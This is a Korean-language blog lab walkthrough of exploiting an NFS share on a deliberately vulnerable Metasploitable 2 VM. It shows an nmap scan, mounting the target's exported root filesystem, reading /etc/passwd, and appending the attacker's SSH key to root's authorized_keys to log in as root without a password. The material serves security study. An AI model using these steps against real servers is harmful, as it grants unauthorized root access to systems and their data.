본문으로 바로가기

Metasploitable V2 Linux 취약점 ( NFS 전체 공유 )

category Security/정보 수집 2017. 11. 14. 20:29

- 사용 시스템

KaliLinux

Metasploitable V2 Linux


- NFS

분산 파일시스템의 종류(Distributed File System)- CIFS/SMB- NFS

리눅스 시스템에서 CIFS/SMB 프로토콜을 지원하기 위한 프로그램 => samba

NFS(Network File System) : Linux 공유 자원을 Linux 클라이언트가 사용하기 위한 파일시스템


----- NFS Server ----- ----- NFS Client -----

# vi /etc/exports     <----------- # mkdir /mnt/nfs 

/share *(ro)   # mount <서버IP>:/share /mnt/nfs 

# service nfs restart

/etc/exports 파일의 형식

---------------------------------------

공유할자원 접근할호스트(공유옵션)


(예제) /etc/exports 파일 내용

---------------------------

(예) /share server1(ro) server2(rw,no_root_squash)

(예) /pub (ro,insecure,all_squash)

(예) /test *(ro)


- 실습

(kali)

1. 서비스 확인

# nmap -p 2049 192.168.17.0/24  

 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-14 20:16 KST

Nmap scan report for 192.168.17.1

Host is up (0.00028s latency).

PORT     STATE    SERVICE

2049/tcp filtered nfs

MAC Address: 00:50:56:C0:00:08 (VMware)


Nmap scan report for 192.168.17.2

Host is up (0.00013s latency).

PORT     STATE  SERVICE

2049/tcp closed nfs

MAC Address: 00:50:56:E0:95:FA (VMware)


Nmap scan report for 192.168.17.100

Host is up (0.00035s latency).

PORT     STATE  SERVICE

2049/tcp closed nfs

MAC Address: 00:0C:29:7C:D6:F0 (VMware)


Nmap scan report for 192.168.17.134

Host is up (0.00019s latency).

PORT     STATE SERVICE

2049/tcp open  nfs

MAC Address: 00:0C:29:FA:DD:2A (VMware)


Nmap scan report for 192.168.17.254

Host is up (0.00036s latency).

PORT     STATE    SERVICE

2049/tcp filtered nfs

MAC Address: 00:50:56:F6:FA:06 (VMware)


Nmap scan report for 192.168.17.50

Host is up (0.000057s latency).

PORT     STATE  SERVICE

2049/tcp closed nfs


Nmap done: 256 IP addresses (6 hosts up) scanned in 5.81 seconds

 


2. 공유자원 마운트

# showmount -e 192.168.17.134

 

 Export list for 192.168.17.134:

/ *

 

[참고] 안된다면 

# apt-get -y install nfs-common


# mkdir -p /mnt/nfs

# mount 192.168.17.134:/ /mnt/nfs

# df -h

 

 Filesystem        Size  Used Avail Use% Mounted on

udev              979M     0  979M   0% /dev

tmpfs             199M  7.0M  192M   4% /run

/dev/sda1          57G   10G   44G  19% /

tmpfs             994M     0  994M   0% /dev/shm

tmpfs             5.0M     0  5.0M   0% /run/lock

tmpfs             994M     0  994M   0% /sys/fs/cgroup

tmpfs             199M   28K  199M   1% /run/user/131

tmpfs             199M   28K  199M   1% /run/user/0

192.168.17.134:/  7.0G  1.5G  5.2G  22% /mnt/nfs

 


# cd /mnt/nfs

# ls

 

 bin    dev   initrd      lost+found  nohup.out  root  sys  var

boot   etc   initrd.img  media       opt        sbin  tmp  vmlinuz

cdrom  home  lib         mnt         proc       srv   usr

 

> meta 서버의 최상위로 접속한것을 알 수 있다. 


# cat etc/passwd | head     ( # cat /mnt/nfs/etc/passwd | head )

 

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

 


- ssh-keygen 명령어로 private/public key 생성

# ssh-keygen

 

 Generating public/private rsa key pair.

Enter file in which to save the key (/root/.ssh/id_rsa): <enter>

Enter passphrase (empty for no passphrase): <enter>

Enter same passphrase again: <enter>

Your identification has been saved in /root/.ssh/id_rsa.

Your public key has been saved in /root/.ssh/id_rsa.pub.

The key fingerprint is:

SHA256:2dJj8CPnLuxSEwkoNSItQ22dOOQ049W3qUouz3eFMY0 root@kali

The key's randomart image is:

+---[RSA 2048]----+

|oo+*=oo          |

|o.**=+.. .       |

| o.+.  .o.=      |

|        oE .     |

|        S.%      |

|     . .oB +     |

|    o .o .o      |

|   ..o..oo       |

|    oo.oo..      |

+----[SHA256]-----+

 


# cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys 

# cat /mnt/nfs/root/.ssh/authorized_keys 

 

 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6

PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teo

weG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8

wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWoc

yQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cC

s4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDd/3azaQNnH9Li4/QL4FLGSWeCOyB3sV1Bm7C

eQ1e1wSMiNE6fFhLhrScBofeefT9ku7wxaFhcAIwhb2eFeqbEKEL4Q7jwwbo8AZLRsu9+5yUoV/iboyxj7

EasSP0sy/cTgzXJSVf8SalH8qlrrWx9zI/ju+C+3g30sy2yzrC3HkmWP+j4eX5BfFZ/Cwcnq8peWdjDTTM8s

R692xhQOy9G2sYpF7ih9ePR7ZLn7vzCFp3CVtwjBNmhUpwqBn6AAqorAOPNzSXu9KbBs6olXtVOYN4eq

GC3fadt+qO8r+j07S5OZCw5EBjdeWC13T+8i4NStM5MV7GCapEIQOM5VJzH root@kali

 


# cd

# umount /mnt/nfs

# df -h

> 마운트 해제 확인


# ssh root@192.168.17.134

> 암호 입력을 하지 않아도 접속이 가능해졌다. 


'Security > 정보 수집' 카테고리의 다른 글

Metasploitable V2 Linux 취약점 ( UnealIRCd )  (0) 2017.11.15
Metasploitable V2 Linux 취약성 ( VSFTPD backdoor )  (0) 2017.11.14
Metasploitable V2 Linux 서버의 취약점 ( rCMD )  (0) 2017.11.14
Searchsploit 사용해보고 구현하기  (0) 2017.11.14
[참고] 취약한 암호와 강력한 암호  (0) 2017.11.14
댓글 , 엮인글
WE STUDY LOG
블로그 이미지 이만석 님의 블로그
MENU
CATEGORY
VISITOR 오늘 / 전체

티스토리툴바